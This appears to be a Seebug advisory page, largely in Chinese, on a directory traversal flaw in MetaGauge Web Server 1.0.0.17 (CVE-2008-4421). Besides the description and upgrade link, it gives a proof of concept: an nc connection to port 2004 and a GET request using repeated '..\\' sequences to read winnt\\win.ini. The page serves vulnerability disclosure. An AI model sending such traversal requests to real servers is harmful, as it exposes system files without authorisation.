Lucene search
RootSSV:4166HistoryOct 08, 2008 - 12:00 a.m.
MetaGauge Web Server目录遍历漏洞
2008-10-0800:00:00
Root
www.seebug.org
16
0.018 Low
EPSS
Percentile
86.6%
BUGTRAQ ID: 31596
CVE ID:CVE-2008-4421
CNCVE ID:CNCVE-20084421
MetaGauge Web Server是一款WEB服务器。
MetaGauge Web Server不正确处理用户提交的GET请求,远程攻击者可以利用漏洞以WEB权限查看系统文件内容。
提交包含多个"…"字符作为GET请求数据,可绕过目录限制,以WEB权限查看系统文件内容。
Hammer Software MetaGauge 1.0 17
升级程序:
Hammer Software MetaGauge 1.0 17
Hammer Software metagauge.zip
<a href=“http://dl.hammer-software.com/metagauge.zip” target=“_blank”>http://dl.hammer-software.com/metagauge.zip</a>
C:\> nc targethost 2004
GET /..\..\..\..\..\..\winnt\win.ini HTTP/1.1
Related
seebug
seebug
Hammer Software MetaGauge 1.0.0.17 Directory Traversal Vulnerability
2008-10-07 00:00:00
hammer software metagauge 1.0.0.17 - Directory Traversal vulnerability
2014-07-01 00:00:00
cve
cve
CVE-2008-4421
2008-10-07 20:00:00
prion
prion
Directory traversal
2008-10-07 20:00:00
securityvulns
securityvulns
MetaGauge 1.0.0.17 Directory Traversal
2008-10-06 00:00:00
exploitpack
exploitpack
Hammer Software MetaGauge 1.0.0.17 - Directory Traversal
2008-10-06 00:00:00
packetstorm
packetstorm
hammer-traversal.txt
2008-10-06 00:00:00
exploitdb
exploitdb
Hammer Software MetaGauge 1.0.0.17 - Directory Traversal
2008-10-06 00:00:00